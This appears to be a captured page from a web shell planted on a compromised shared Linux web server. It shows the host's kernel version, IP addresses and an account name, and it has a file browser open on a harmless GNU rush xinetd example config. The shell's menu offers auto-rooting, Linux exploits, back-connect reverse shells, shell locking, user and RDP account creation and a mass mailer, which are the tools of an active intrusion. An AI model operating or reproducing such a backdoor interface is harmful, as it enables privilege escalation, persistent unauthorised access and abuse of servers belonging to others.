Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
rush /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
README.mkchroot-rush.gz
2.3
KB
-rw-r--r--
rush-notifier
581
B
-rwxr-xr-x
rush.inetutils-inetd
1.26
KB
-rw-r--r--
rush.rc
1.29
KB
-rw-r--r--
rush.xinetd
1.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rush.xinetd
# Deposit this file, suitably renamed in # /etx/xinetd.d/ # # There should be at most one instance of the # next service 'tcpmux'. service tcpmux { disable = no type = INTERNAL id = tcpmux socket_type = stream protocol = tcp #flags = IPv6 user = root wait = no log_type = SYSLOG user notice log_on_success = PID EXIT log_on_failure = ATTEMPT } # The service name(s) of the following service(s) must match # the corresponding rule in '/etc/rush.rc', if GNU rush shall # be able to send notifications. # # The names must not coincide with any name present # in '/etc/services'. # # Activate 'rsync-home' if needed. service sftp-rush { disable = no type = TCPMUXPLUS UNLISTED socket_type = stream protocol = tcp wait = no user = root server = /usr/bin/rush-notifier } service scp-to { disable = no type = TCPMUXPLUS UNLISTED socket_type = stream protocol = tcp wait = no user = root server = /usr/bin/rush-notifier } service rsync-home { disable = yes type = TCPMUXPLUS UNLISTED socket_type = stream protocol = tcp wait = no user = root server = /usr/bin/rush-notifier }
Close